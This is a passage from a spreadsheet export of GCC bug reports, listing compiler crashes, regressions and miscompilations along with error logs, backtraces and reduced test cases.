==24948==    by 0x805CABC: ada__strings__wide_superbounded__super_trim__4 
(a-stwisu.adb:1664) 
==24948==    by 0x8068805: cxa4020__test_block__b10__trim__4.1007 
(a-stwibo.ads:810) 
==24948==    by 0x806ACDC: _ada_cxa4020 (cxa4020.adb:411) 
==24948== 
==24948== Source and destination overlap in memcpy(0x52BFC8F8 0x52BFC8FC 12) 
==24948==    at 0x1B906AC5: memcpy (mac_replace_strmem.c:113) 
==24948==    by 0x805CABC: ada__strings__wide_superbounded__super_trim__4 
(a-stwisu.adb:1664) 
==24948==    by 0x8068805: cxa4020__test_block__b10__trim__4.1007 
(a-stwibo.ads:810) 
==24948==    by 0x806ADC2: _ada_cxa4020 (cxa4020.adb:422) 
==24948== 
==24948== Source and destination overlap in memcpy(0x52BFC8F8 0x52BFC900 10) 
==24948==    at 0x1B906AC5: memcpy (mac_replace_strmem.c:113) 
==24948==    by 0x805CABC: ada__strings__wide_superbounded__super_trim__4 
(a-stwisu.adb:1664) 
==24948==    by 0x8068805: cxa4020__test_block__b10__trim__4.1007 
(a-stwibo.ads:810) 
==24948==    by 0x806AEA8: _ada_cxa4020 (cxa4020.adb:433) 
==== CXA4020 PASSED ============================. 
==24948== 
==24948== ERROR SUMMARY: 4 errors from 4 contexts (suppressed: 13 from 1) 
==24948== malloc/free: in use at exit: 10280 bytes in 2 blocks. 
==24948== malloc/free: 23 allocs 21 frees 12122 bytes allocated. 
==24948== For a detailed leak analysis  rerun with: --leak-check=yes 
==24948== For counts of detected errors rerun with: -v 
PASS:   cxa4020</t>
  </si>
  <si>
    <t>GCC-12132</t>
  </si>
  <si>
    <t>[3.4 regression] spurious int ._0 (or int $_0) in error message</t>
  </si>
  <si>
    <t>Compiling the invalid code snippet
--------------------------------------------
inline template  void foo () {}
--------------------------------------------
with mainline I get the following error message:
  bug.cc:1: error: expected unqualified-id
  bug.cc:1: error: ISO C++ forbids declaration of `type name' with no type
  bug.cc:1: error: abstract declarator `int' used as declaration
  bug.cc:1: error: explicit instantiation of non-template `int ._0'
  bug.cc:1: error: expected `'
which is bogus. The worst part is int ._0 which is nowhere to be
seen in the code. The rest isn't very helpful either.
Previous versions of gcc just gave a simple
  bug.cc:1: error: parse error before `&lt;' token
which isn't very elaborate but not as confusing as mainline's message.
Btw 3.3 branch issues an ICE when compiling the following code
(one can use any name of a builtin instead of abort):
--------------------------------------------
inline template  void foo () {}
void abort ()
--------------------------------------------
The error message then is:
  bug.cc:1: error: parse error before `&lt;' token
  bug.cc:3: internal compiler error: in lookup_template_function at
cp/pt.c:         4002
  Please submit a full bug report [etc.]
But since this is an error-recovery problem which is fixed on mainline
there's nothing more to do about the ICE.</t>
  </si>
  <si>
    <t>GCC-7954</t>
  </si>
  <si>
    <t>g++ 2.95.4 bug while compiling QT library for Linux 2.4.19</t>
  </si>
  <si>
    <t>While compiling QTlib. I have the error :
Internal compiler error
I thought first it was a lib error but the message explain that it comes from the compiler. I think.
I hope i haven't made a mistake.
Here is the command line:
g++ -c -pipe -fno-exceptions -Wall -W -O2 -fPIC -DQT_SHARED -DQT_NO_DEBUG -DQT_NO_NIS -DQT_NO_IMAGEIO_MNG -DQT_NO_IMAGEIO_JPEG -DQT_NO_STYLE_AQUA -DQT_NO_STYLE_INTERLACE -DQT_NO_STYLE_COMPACT -I/usr/include/freetype2 -I3rdparty/libpng -I3rdparty/zlib -I/home/tr0n/qt-x11-free-3.0.5/include -I/usr/X11R6/include -I/usr/X11R6/include -I.moc/release-shared/ -I/home/tr0n/qt-x11-free-3.0.5/mkspecs/linux-g++ -o .obj/release-shared/moc_qiconview.o .moc/release-shared/moc_qiconview.cpp
and the errors occure in a file that i join you because it's to long to put here. The end of the file is explicit.
Release:
g++ 2.95.4
Environment:
Linux Debian 3.0 kernel 2.4.19</t>
  </si>
  <si>
    <t>stephane.duverger</t>
  </si>
  <si>
    <t>GCC-586</t>
  </si>
  <si>
    <t>GNU Pascal Internal Error</t>
  </si>
  <si>
    <t>While compiling the attached source package I get the following errors:
stupiddog@linux:~/fernuni/prettyprint &gt; gpc --automake -o prettyprint pretty.pas 
65520
lstr_t.pas:168: warning: unknown string capacity - assuming 255
heap_f.pas:122: warning: `far' directive ignored in flat memory model
outpu_f.pas:410: warning: GPC currently ignores indices and field names in initializers
outpu_f.pas: In function `Outerrortext':
outpu_f.pas:1631: Internal compiler error in `emit_move_insn' at ./../expr.c:2593
Please submit a full bug report.
See  for instructions.
gpc1: gpc exited with status 1
lstr_t.pas:279: module/unit `outpu_f' could not be compiled
gpc1: gpc exited with status 1
pretty.pas:133: module/unit `lstr_t' could not be compiled     
Full working directory is attached.
Release:
gpc version 19991030 based on 2.95.2 19991024 (release)
Environment:
SuSE Linux 7.0 (Kernel 2.2.16 glibc 2.1.3)</t>
  </si>
  <si>
    <t>GCC-44778</t>
  </si>
  <si>
    <t>[4.6 regression]? Behaviour change with pointers to members</t>
  </si>
  <si>
    <t>The attached testcase is compiled without complaints by g++ 4.4.2 and 4.5.0 but is rejected by current trunk. I'm quite sure that it was still accepted by the trunk a few days ago.
Is this change intended i.e. is the test case ill-formed and g++ has stricter checks now?
~/tmp&gt;g++ -v -Wfatal-errors temptest.cc
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/afs/mpa/data/martin/ugcc/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /scratch/martin/gcc/configure --disable-bootstrap --enable-gold --enable-plugins --prefix=/afs/mpa/data/martin/ugcc --with-ppl=/afs/mpa/data/martin/numlibs64 --with-cloog=/afs/mpa/data/martin/numlibs64 --with-libelf=/afs/mpa/data/martin/numlibs64 --enable-languages=c++fortran --enable-target=all --enable-checking=release
Thread model: posix
gcc version 4.6.0 20100701 (experimental) [trunk revision 161665] (GCC) 
COLLECT_GCC_OPTIONS='-v' '-Wfatal-errors' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /afs/mpa/data/martin/ugcc/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/cc1plus -quiet -v -D_GNU_SOURCE temptest.cc -quiet -dumpbase temptest.cc -mtune=generic -march=x86-64 -auxbase temptest -Wfatal-errors -version -o /tmp/ccS9t2f9.s
GNU C++ (GCC) version 4.6.0 20100701 (experimental) [trunk revision 161665] (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.6.0 20100628 (experimental) [trunk revision 161485] GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.1
warning: GMP header version 4.3.2 differs from library version 4.3.1.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
ignoring nonexistent directory /afs/mpa/data/martin/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /afs/mpa/data/martin/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/../../../../include/c++/4.6.0
 /afs/mpa/data/martin/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/../../../../include/c++/4.6.0/x86_64-unknown-linux-gnu
 /afs/mpa/data/martin/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/../../../../include/c++/4.6.0/backward
 /usr/local/include
 /afs/mpa/data/martin/ugcc/include
 /afs/mpa/data/martin/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/include
 /afs/mpa/data/martin/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/include-fixed
 /usr/include
End of search list.
GNU C++ (GCC) version 4.6.0 20100701 (experimental) [trunk revision 161665] (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.6.0 20100628 (experimental) [trunk revision 161485] GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.1
warning: GMP header version 4.3.2 differs from library version 4.3.1.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 5f71a12a0438e83fd7b8caa75cf5702d
temptest.cc: In member function 'void Healpix_Map::Import_nograde(const Healpix_Map&amp;)':
temptest.cc:19:25: error: invalid use of 'Healpix_Map::ring2nest(int) const' to form a pointer-to-member-function
compilation terminated due to -Wfatal-errors.
~/tmp&gt;g++ -v -c -Wfatal-errors temptest.cc
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/scratch/martin/ugcc45/libexec/gcc/x86_64-unknown-linux-gnu/4.5.1/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /scratch/martin/gcc45/configure --disable-bootstrap --enable-gold --enable-plugins --prefix=/scratch/martin/ugcc45 --with-mpfr=/afs/mpa/data/martin/numlibs64 --with-gmp=/afs/mpa/data/martin/numlibs64 --with-mpc=/afs/mpa/data/martin/numlibs64 --with-ppl=/afs/mpa/data/martin/numlibs64 --with-cloog=/afs/mpa/data/martin/numlibs64 --with-libelf=/afs/mpa/data/martin/numlibs64 --enable-languages=c++fortran --enable-target=all --enable-checking=release
Thread model: posix
gcc version 4.5.1 20100615 (prerelease) [gcc-4_5-branch revision 160776] (GCC) 
COLLECT_GCC_OPTIONS='-v' '-c' '-Wfatal-errors' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /scratch/martin/ugcc45/libexec/gcc/x86_64-unknown-linux-gnu/4.5.1/cc1plus -quiet -v -D_GNU_SOURCE temptest.cc -quiet -dumpbase temptest.cc -mtune=generic -march=x86-64 -auxbase temptest -Wfatal-errors -version -o /tmp/ccbESmf0.s
GNU C++ (GCC) version 4.5.1 20100615 (prerelease) [gcc-4_5-branch revision 160776] (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.4.2 GMP version 4.3.1 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
ignoring nonexistent directory /scratch/martin/ugcc45/lib/gcc/x86_64-unknown-linux-gnu/4.5.1/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /scratch/martin/ugcc45/lib/gcc/x86_64-unknown-linux-gnu/4.5.1/../../../../include/c++/4.5.1
 /scratch/martin/ugcc45/lib/gcc/x86_64-unknown-linux-gnu/4.5.1/../../../../include/c++/4.5.1/x86_64-unknown-linux-gnu
 /scratch/martin/ugcc45/lib/gcc/x86_64-unknown-linux-gnu/4.5.1/../../../../include/c++/4.5.1/backward
 /usr/local/include
 /scratch/martin/ugcc45/include
 /scratch/martin/ugcc45/lib/gcc/x86_64-unknown-linux-gnu/4.5.1/include
 /scratch/martin/ugcc45/lib/gcc/x86_64-unknown-linux-gnu/4.5.1/include-fixed
 /usr/include
End of search list.
GNU C++ (GCC) version 4.5.1 20100615 (prerelease) [gcc-4_5-branch revision 160776] (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.4.2 GMP version 4.3.1 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: f67756f729cefbeb791a25b18e9799ee
COLLECT_GCC_OPTIONS='-v' '-c' '-Wfatal-errors' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 as -V -Qy --64 -o temptest.o /tmp/ccbESmf0.s
GNU assembler version 2.19.1 (x86_64-unknown-linux-gnu) using BFD version (GNU Binutils) 2.19.1
COMPILER_PATH=/scratch/martin/ugcc45/libexec/gcc/x86_64-unknown-linux-gnu/4.5.1/:/scratch/martin/ugcc45/libexec/gcc/x86_64-unknown-linux-gnu/4.5.1/:/scratch/martin/ugcc45/libexec/gcc/x86_64-unknown-linux-gnu/:/scratch/martin/ugcc45/lib/gcc/x86_64-unknown-linux-gnu/4.5.1/:/scratch/martin/ugcc45/lib/gcc/x86_64-unknown-linux-gnu/
LIBRARY_PATH=/scratch/martin/ugcc45/lib/gcc/x86_64-unknown-linux-gnu/4.5.1/:/scratch/martin/ugcc45/lib/gcc/x86_64-unknown-linux-gnu/4.5.1/../../../../lib64/:/lib/../lib64/:/usr/lib/../lib64/:/scratch/martin/ugcc45/lib/gcc/x86_64-unknown-linux-gnu/4.5.1/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-v' '-c' '-Wfatal-errors' '-shared-libgcc' '-mtune=generic' '-march=x86-64'</t>
  </si>
  <si>
    <t>GCC-25723</t>
  </si>
  <si>
    <t>Segmentation Fault</t>
  </si>
  <si>
    <t>During the build of the TAO 1.4.1 package two files provoked internal compiler errors. gcc-3.4.2 has the same problem. gcc-3.2.2 compiles them just fine.
This seems to be a Solaris problem as the same source compiles fine with gcc-3.4.2 on a number of Linuxes on X86 and PPC.
How-To-Repeat: preprocessor output is attached to this message. Both files are included in case the problem is not the same for both.
g++ -v
Reading specs from /usr/local/gcc-3.4.5/lib/gcc/sparc-sun-solaris2.9/3.4.5/specs
Configured with: /var/sun26/tmp/gcc-3.4.5/configure --prefix=/usr/local/gcc-3.4.5 --enable-threads --enable-languages=cc++
Thread model: posix
gcc version 3.4.5
g++ -save-temps -W -Wall -Wpointer-arith -O3 -pipe -D_REENTRANT -D_POSIX_THREADS -D_POSIX_THREAD_SAFE_FUNCTIONS -D_REENTRANT -I/usr/users/tao/ultra4/Overnight_Builds/TAO14/gcc345/standard/tao14 -I/usr/users/tao/ultra4/Overnight_Builds/TAO14/gcc345/standard/tao14/TAO -DACE_NDEBUG -DACE_USE_RCSID=0 -DACE_HAS_EXCEPTIONS -DACE_NO_INLINE -I/usr/users/tao/ultra4/Overnight_Builds/TAO14/gcc345/standard/tao14/TAO -I/usr/users/tao/ultra4/Overnight_Builds/TAO14/gcc345/standard/tao14/TAO/orbsvcs -x c++ -o .obj/demux_test_client.o demux_test_client.cpp
g++: warning: -pipe ignored because -save-temps specified
g++: Internal error: Segmentation Fault (program cc1plus)
Please submit a full bug report.</t>
  </si>
  <si>
    <t>Donald.Sharp</t>
  </si>
  <si>
    <t>GCC-68852</t>
  </si>
  <si>
    <t>[6 Regression] ICE in vect_is_simple_use (tree-vect-stmts.c:8750) using -O3</t>
  </si>
  <si>
    <t>Created attachment 36991
test-case
Starting from r230993:
Author: rguenth 
Date:   Fri Nov 27 08:31:44 2015 +0000
    2015-11-27  Richard Biener  
        PR tree-optimization/68553
        * tree-vect-slp.c (vect_get_mask_element): Remove.
        (vect_transform_slp_perm_load): Implement in a simpler way.
        * gcc.dg/vect/pr45752.c: Adjust.
        * gcc.dg/vect/slp-perm-4.c: Likewise.
I see ICE in tree-vect-stmts.c:8750:
$ ./xgcc -B. -O3 ~/Programming/testcases/tree-vect-stmts-ice/vect-ice.ii -c
/home/marxin/Programming/testcases/tree-vect-stmts-ice/vect-ice.ii: In function â€˜void fn1()â€™:
/home/marxin/Programming/testcases/tree-vect-stmts-ice/vect-ice.ii:46:6: internal compiler error: in vect_is_simple_use at tree-vect-stmts.c:8750
 void fn1() {
      ^~~
0xf28870 vect_is_simple_use(tree_node* vec_info* gimple** vect_def_type* tree_node**)
	../../gcc/tree-vect-stmts.c:8750
0xf2f143 vectorizable_operation
	../../gcc/tree-vect-stmts.c:4874
0xf3e2f7 vect_analyze_stmt(gimple* bool* _slp_tree*)
	../../gcc/tree-vect-stmts.c:8090
0xf57192 vect_slp_analyze_node_operations
	../../gcc/tree-vect-slp.c:2205
0xf57113 vect_slp_analyze_node_operations
	../../gcc/tree-vect-slp.c:2196
0xf583cc vect_slp_analyze_operations(vec void*)
	../../gcc/tree-vect-slp.c:2228
0xf5d35c vect_slp_analyze_bb_1
	../../gcc/tree-vect-slp.c:2511
0xf5d35c vect_slp_bb(basic_block_def*)
	../../gcc/tree-vect-slp.c:2598
0xf5f4b5 execute
	../../gcc/tree-vectorizer.c:759
Thanks
Martin</t>
  </si>
  <si>
    <t>GCC-909</t>
  </si>
  <si>
    <t>Spurious error using nested classes in constructor calls</t>
  </si>
  <si>
    <t>Given a nested class an attempt to construct an object using a constructor taking a reference of type const A::Nested &amp; and another argument fails.  Defaulting the second argument succeeds letting the Nested object be implicitly constructed succeeds.  Using an old-style cast
for either the argument to the nested type constructor or the nested type constructor also succeed.  WIERD!
A a(A::Nested(i) Z)      // ERROR:  type specifier omitted
			   // for parameter
A b(A::Nested(int(i)) Z) // ERROR:  type specifier omitted
			   // for parameter
A c(A::Nested((int)i) Z) // OK
Release:
2.95.2 19991024 2.97 20001120
Environment:
Linux
How-To-Repeat:
// Just compile this code
class A {
    public:
        struct Nested { Nested(int i) {} }
        A(const Nested 
}
class B {
    public:
        B(const A::Nested 
        B(const A 
}
int main(void)
{   
    int *Z=0
    int i=1
    A a(A::Nested(i) Z)      // ERROR:  type specifier omitted for parameter
    A b(A::Nested(int(i)) Z) // ERROR:  type specifier omitted for parameter
    A c(A::Nested((int)i) Z) // OK
    A d(A::Nested(1) Z)      // OK
    A e(A::Nested(i))         // OK
    A f(i Z)                 // OK
    B g(A::Nested(i) Z)      // ERROR:  type specifier omitted for parameter
    B h(i Z)                 // OK
}</t>
  </si>
  <si>
    <t>rmgiroux</t>
  </si>
  <si>
    <t>GCC-71004</t>
  </si>
  <si>
    <t>recursive_directory_iterator does not have a user-provided default ctor</t>
  </si>
  <si>
    <t>Hi Jonathan
The default ctor provided for recursive_directory_iterator won't allow it to it to be constructed as const.
// reproducer.cpp
#include 
int main() {
    using namespace std::experimental::filesystem
    const recursive_directory_iterator endIt2
}</t>
  </si>
  <si>
    <t>GCC-844</t>
  </si>
  <si>
    <t>iostream bug (LFS related) in libstdc++ error with glibc-2.2</t>
  </si>
  <si>
    <t>Conflict between datatypes of libio from glibc-2.2 and libstdc++-v3 (also
with gcc-2.95.2)
/usr/local/include/g++/streambuf.h:362: conversion from `__off64_t' to
   non-scalar type `streampos' requested
/usr/local/include/g++/streambuf.h:364: cannot convert `streampos' to `long
   long int' for argument `2' to `__off64_t _IO_seekpos(_IO_FILE* long long
   int int)'
Release:
2.97 20001118 (experimental)
Environment:
System: Linux vaarlahti.uworld 2.2.18pre18 #5 Tue Nov 7 08:05:33 EET 2000 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with: ../gcc/configure --prefix=/usr/local --exec-prefix=/usr/local --with-local-prefix=/usr/local --with-gxx-include-dir=/usr/local/include/g++ --enable-languages=cc++f77
glibc: 2.2
How-To-Repeat:
Compile some suitable C++ project (LAM in this case)</t>
  </si>
  <si>
    <t>GCC-38720</t>
  </si>
  <si>
    <t>_Relative_pointer_impl invokes undefined behavior</t>
  </si>
  <si>
    <t>The _Relative_pointer_impl (and its const variant) implementation invokes
undefined behavior as it computes differences and compares pointers pointing
to different objects.
For example
  int i
  RelPtr p q
  p.set(
  q.set(
  if (p == q)
will reconstruct pointer values based on the addresses of p and q.  This
invokes undefined behavior.
The fix is to do all the pointer arithmetic and the comparisons using
an unsigned integer type (uintptr_t) not using char *.
Likely this causes 23_containers/vector/ext_pointer/modifiers/insert.cc
to fail on alias-improvements branch for i?86 (points-to analysis will
correctly conclude that the objects pointed to by the pointers returned
from get() point to different objects).</t>
  </si>
  <si>
    <t>GCC-46398</t>
  </si>
  <si>
    <t>early FRE miscompiles simple testcase</t>
  </si>
  <si>
    <t>Inserting an early FRE pass after pass_sra_early causes us to miscompile the
following testcase (reduced from cp/parser.c).
int __attribute__((noinline))
test (int token)
{
  int done = 0
  int virtual_p = 0
  while (!done)
    {
      if (token == 42)
        virtual_p = 1
      else
        done = 1
    }
  return virtual_p
}
extern void abort (void)
int
main()
{
  if (test (0) != 0)
    abort ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-25762</t>
  </si>
  <si>
    <t>All objc.dg-struct-layout-encoding-1 fails</t>
  </si>
  <si>
    <t>All the objc.dg-struct-layout-encoding-1 tests fail because ALIGN_DOUBLES (or what ever the option is) is set to be the opposite of the default on Linux and such.</t>
  </si>
  <si>
    <t>GCC-5000</t>
  </si>
  <si>
    <t>volatile asm code fails in template class member functions</t>
  </si>
  <si>
    <t>The compiler gets confused when a member function (static or not) of a template class contains volatile asm.  Attempting to compile the following:
  template  struct test {
    static int foo() {
      __asm__ __volatile__ (movl %eax %eax)
    }
  }
  int main() { 
    test::foo()
    return 0
  } 
results in:
  % g++ -v --save-temps bug2.cc
  Reading specs from /usr/lib/gcc-lib/i386-linux/2.95.4/specs
  gcc version 2.95.4 20011006 (Debian prerelease)
   /usr/lib/gcc-lib/i386-linux/2.95.4/cpp0 -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ bug2.cc bug2.ii
  GNU CPP version 2.95.4 20011006 (Debian prerelease) (i386 Linux/ELF)
  #include ... search starts here:
  #include  search starts here:
   /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../include/g++-3
   /usr/local/include
   /usr/lib/gcc-lib/i386-linux/2.95.4/include
   /usr/include
  End of search list.
  The following default directories have been omitted from the search path:
   /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../i386-linux/include
  End of omitted list.
   /usr/lib/gcc-lib/i386-linux/2.95.4/cc1plus bug2.ii -quiet -dumpbase bug2.cc -version -o bug2.s
  GNU C++ version 2.95.4 20011006 (Debian prerelease) (i386-linux) compiled by GNU C version 2.95.4 20011006 (Debian prerelease).
  bug2.cc: In function `static int test::foo()':
  bug2.cc:8:   instantiated from here
  bug2.cc:3: `volatile' undeclared (first use this function)
  bug2.cc:3: (Each undeclared identifier is reported only once
  bug2.cc:3: for each function it appears in.)
  bug2.cc:3: warning:  qualifier ignored on asm
See also bug report titled asm code with concatenated content fails in template class member functions.
Release:
2.95.4
Environment:
Debian unstable (sid) i386 Linux 2.2.17</t>
  </si>
  <si>
    <t>GCC-1440</t>
  </si>
  <si>
    <t>Linux/PPC segfault in GC_mark_from_mark_stack that kills app</t>
  </si>
  <si>
    <t xml:space="preserve">Responsible-Changed-From-To: apbianco-&gt;tromey
Responsible-Changed-Why: A segfault in GC code looks right into Tom's jurisdiction.
</t>
  </si>
  <si>
    <t>khendricks</t>
  </si>
  <si>
    <t>GCC-4650</t>
  </si>
  <si>
    <t>ICE compiling java code</t>
  </si>
  <si>
    <t>I develop with Forte compile and check the good processing of my program. Afterward I compile and link all my stuff with GCJ. Every thing was ok until today: I've only added a few methodes in a class. No problem occurs while compiling and building with Forte. In the contrary when I try to generate the Stimu.o file (gcj -c Stimu.class) from Stimu.class file (previously generated by Forte from my java file Stimu.java) the following error is repported:
Stimu.class: In method `_GLOBAL__I__ZN3pth5stimu5StimuC1Ev()':
Stimu.class: o : Internal error : Erreur de segmentation
Please submit a full bug report
with preprocessed source if appropriate.
Release:
gcj 3.0
Environment:
Platform : PC/LINUX
Development tool : Forte for java (3.0) and GCJ 3.0</t>
  </si>
  <si>
    <t>philippe.drauge</t>
  </si>
  <si>
    <t>GCC-77429</t>
  </si>
  <si>
    <t>ICE in gfc_check_dependency at fortran/dependency.c:1261</t>
  </si>
  <si>
    <t>Affects version 6 7 at optimization level -Og -Os -O1 or higher.
ICE/backtrace when configured with --enable-checking=yes.
Bailed out with official release (--enable-checking=release).
Invalid code :
$ cat z1.f90
program p
   shape(1) = 0
end
$ cat z2.f90
program p
   shape(12) = 0
end
$ gfortran-7-20160828 -O0 z1.f90
z1.f90:2:3:
    shape(1) = 0
   1
Error: Non-variable expression in variable definition context (assignment) at (1)
$ gfortran-7-20160828 -O2 z1.f90
z1.f90:2:3:
    shape(1) = 0
   1
Error: Non-variable expression in variable definition context (assignment) at (1)
f951: internal compiler error: in gfc_check_dependency at fortran/dependency.c:1261
0x7157b3 gfc_check_dependency(gfc_expr* gfc_expr* bool)
        ../../gcc/fortran/dependency.c:1261
0x7b181b optimize_assignment
        ../../gcc/fortran/frontend-passes.c:1183
0x7b181b optimize_code
        ../../gcc/fortran/frontend-passes.c:221
0x7b4229 gfc_code_walker(gfc_code** int (*)(gfc_code** int* void*) int (*)(gfc_expr** int* void*) void*)
        ../../gcc/fortran/frontend-passes.c:3397
0x7b5284 optimize_namespace
        ../../gcc/fortran/frontend-passes.c:1005
0x7b5440 gfc_run_passes(gfc_namespace*)
        ../../gcc/fortran/frontend-passes.c:132
0x6efbc7 gfc_resolve(gfc_namespace*)
        ../../gcc/fortran/resolve.c:15608
0x6daeba resolve_all_program_units
        ../../gcc/fortran/parse.c:5849
0x6daeba gfc_parse_file()
        ../../gcc/fortran/parse.c:6101
0x71d3a2 gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:198</t>
  </si>
  <si>
    <t>GCC-16955</t>
  </si>
  <si>
    <t>[4.0 Regression] bootstrap failure on powerpc-apple-darwin</t>
  </si>
  <si>
    <t>:
int
add_double (long long l1 long long h1)
{
  return (h1 ^ l1) &lt; 0
}</t>
  </si>
  <si>
    <t>GCC-77747</t>
  </si>
  <si>
    <t>GCC allows inheriting constructors from indirect base</t>
  </si>
  <si>
    <t>Created attachment 39690
Minimal test case (preprocessed file)
According to the standard ([namespace.udecl] Â§3) it should only be possible to inherit constructors from a direct base class. The following example shows a good example why this is important:
class X {
public:
  X() { std::cout &lt;&lt; Default &lt;&lt; std::endl }
  X(int a) { std::cout &lt;&lt; a &lt;&lt; std::endl }
}
class Y : public X { }
class Z : public Y {
  using X::X
}
int main() {
  Z instance{3}  // how is Y constructed?
}
G++ accepts this code even with strictest warning level settings with the following result: Y is default-constructed default-constructing X on its way and the parameter provided in the last line is silently ignored.
System version:
Target: x86_64-redhat-linux
Configured with: ../configure --enable-bootstrap --enable-languages=cc++objcobj-c++fortranadagolto --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-shared --enable-threads=posix --enable-checking=release --enable-multilib --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --with-linker-hash-style=gnu --enable-plugin --enable-initfini-array --disable-libgcj --with-isl --enable-libmpx --enable-gnu-indirect-function --with-tune=generic --with-arch_32=i686 --build=x86_64-redhat-linux
Thread model: posix
gcc version 6.2.1 20160916 (Red Hat 6.2.1-2) (GCC) 
Command line:
g++ -Weffc++ -Wall -Wextra -pedantic -fno-diagnostics-show-caret -save-temps skip.cpp -o skip
Compiler output: none</t>
  </si>
  <si>
    <t>vasek.potocek</t>
  </si>
  <si>
    <t>GCC-5602</t>
  </si>
  <si>
    <t>g++3.0.3 internal compiler error emit_move_insn_1 at expr.c:2975</t>
  </si>
  <si>
    <t>g++ failed while compiling code for mozilla
Release:
3.0.3
Environment:
System: IRIX64 forte 6.5 07201611 IP27
host: mips-sgi-irix6.5
build: mips-sgi-irix6.5
target: mips-sgi-irix6.5
configured with: ../src/gcc-3.0.3/configure --prefix=/hsgi/mathew/root
How-To-Repeat:
Preprocessor output:
typedef int ptrdiff_t
typedef unsigned int size_t
extern C {
typedef unsigned char PRUint8
typedef signed char PRInt8
typedef unsigned short PRUint16
typedef short PRInt16
typedef unsigned int PRUint32
typedef int PRInt32
typedef long long PRInt64
typedef unsigned long long PRUint64
typedef int PRIntn
typedef unsigned int PRUintn
typedef double PRFloat64
typedef size_t PRSize
typedef PRInt32 PROffset32
typedef PRInt64 PROffset64
typedef ptrdiff_t PRPtrdiff
typedef unsigned long PRUptrdiff
typedef PRIntn PRBool
typedef PRUint8 PRPackedBool
typedef enum { PR_FAILURE = -1 PR_SUCCESS = 0 } PRStatus
typedef long PRWord
typedef unsigned long PRUword
typedef PRUintn uintn
typedef PRIntn intn
#ident $Revision: 3.141 $
#ident $Id: standards.hv 1.19 1997/12/15 21:30:25 jph Exp $
extern C {
#ident $Revision: 1.11 $
typedef int __int32_t
typedef unsigned __uint32_t
typedef long long __int64_t
typedef unsigned long long __uint64_t
typedef __int32_t __psint_t
typedef __uint32_t __psunsigned_t
typedef __int32_t __scint_t
typedef __uint32_t __scunsigned_t
}
typedef unsigned char uchar_t
typedef unsigned short ushort_t
typedef unsigned int uint_t
typedef unsigned long ulong_t
extern C {
typedef unsigned int pthread_t
typedef struct { long __D[5] } pthread_attr_t
typedef struct { long __D[8] } pthread_mutex_t
typedef struct { long __D[2] } pthread_mutexattr_t
typedef struct { long __D[8] } pthread_cond_t
typedef struct { long __D[2] } pthread_condattr_t
typedef struct { long __D[16] } pthread_rwlock_t
typedef struct { long __D[4] } pthread_rwlockattr_t
typedef int pthread_key_t
typedef int pthread_once_t
}
typedef char * addr_t
typedef char * caddr_t
typedef __int64_t daddr_t
typedef long pgno_t
typedef __uint32_t pfn_t
typedef short cnt_t
typedef unsigned long basictime_t
typedef __int64_t micro_t
typedef __int32_t pgcnt_t
typedef enum { B_FALSE B_TRUE } boolean_t
typedef long id_t
typedef ulong_t major_t
typedef ulong_t minor_t
typedef ushort_t o_mode_t
typedef short o_dev_t
typedef ushort_t o_uid_t
typedef o_uid_t o_gid_t
typedef short o_nlink_t
typedef short o_pid_t
typedef __uint32_t o_ino_t
typedef unsigned long mode_t
typedef unsigned long dev_t
typedef long uid_t
typedef long gid_t
typedef unsigned long nlink_t
typedef long pid_t
typedef int tid_t
typedef dev_t vertex_hdl_t
typedef __uint64_t ino_t
typedef __uint64_t ino64_t
typedef __int64_t off_t
typedef __int64_t off64_t
typedef __scint_t __scoff_t
typedef __scoff_t scoff_t
typedef __int64_t blkcnt64_t
typedef __uint64_t fsblkcnt64_t
typedef __uint64_t fsfilcnt64_t
typedef __int64_t blkcnt_t
typedef __uint64_t fsblkcnt_t
typedef __uint64_t fsfilcnt_t
typedef long swblk_t
typedef unsigned long paddr_t
typedef unsigned long iopaddr_t
